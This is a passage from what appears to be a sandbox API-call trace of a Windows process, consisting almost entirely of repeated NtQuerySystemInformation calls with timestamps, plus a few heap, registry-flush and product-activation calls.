SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6a0, Length=0x20, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd630, Length=0x20, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd630, Length=0x20, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x20, ResultLength=0x0) [0234.364] GetTickCount () returned 0x117aeff [0234.364] GetProcessHeap () returned 0x269489b0000 [0234.364] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x18) returned 0x269495843a0 [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd960, Length=0x30, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7e0, Length=0x30, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x38, ResultLength=0x0) [0234.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x30, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x30, ResultLength=0x0) [0234.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd700, Length=0x20, ResultLength=0x0) [0234.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x30, ResultLength=0x0) [0234.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x30, ResultLength=0x0) [0234.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd790, Length=0x30, ResultLength=0x0) [0234.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x18, ResultLength=0x0) [0234.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.617] RegFlushKey (hKey=0x33c) returned 0x0 [0234.846] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0234.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd860, Length=0x38, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x30, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd700, Length=0x20, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7a0, Length=0x30, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x30, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x28, ResultLength=0x0) [0234.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdad0, Length=0x28, ResultLength=0x0) [0234.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9b0, Length=0x58, ResultLength=0x0) [0234.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x28, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x28, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x28, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6e0, Length=0x28, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd750, Length=0x28, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7d0, Length=0x28, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7d0, Length=0x28, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd640, Length=0x20, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5c0, Length=0x20, ResultLength=0x0) [0234.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5c0, Length=0x20, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5c0, Length=0x20, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x20, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd730, Length=0x20, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x20, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x20, ResultLength=0x0) [0234.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x20, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd730, Length=0x20, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x20, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x20, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6b0, Length=0x20, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8a0, Length=0x38, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd730, Length=0x20, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6c0, Length=0x20, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6c0, Length=0x20, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd8e0, Length=0x40, ResultLength=0x0) [0234.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd800, Length=0x38, ResultLength=0x0) [0234.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd720, Length=0x38, ResultLength=0x0) [0234.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.885] 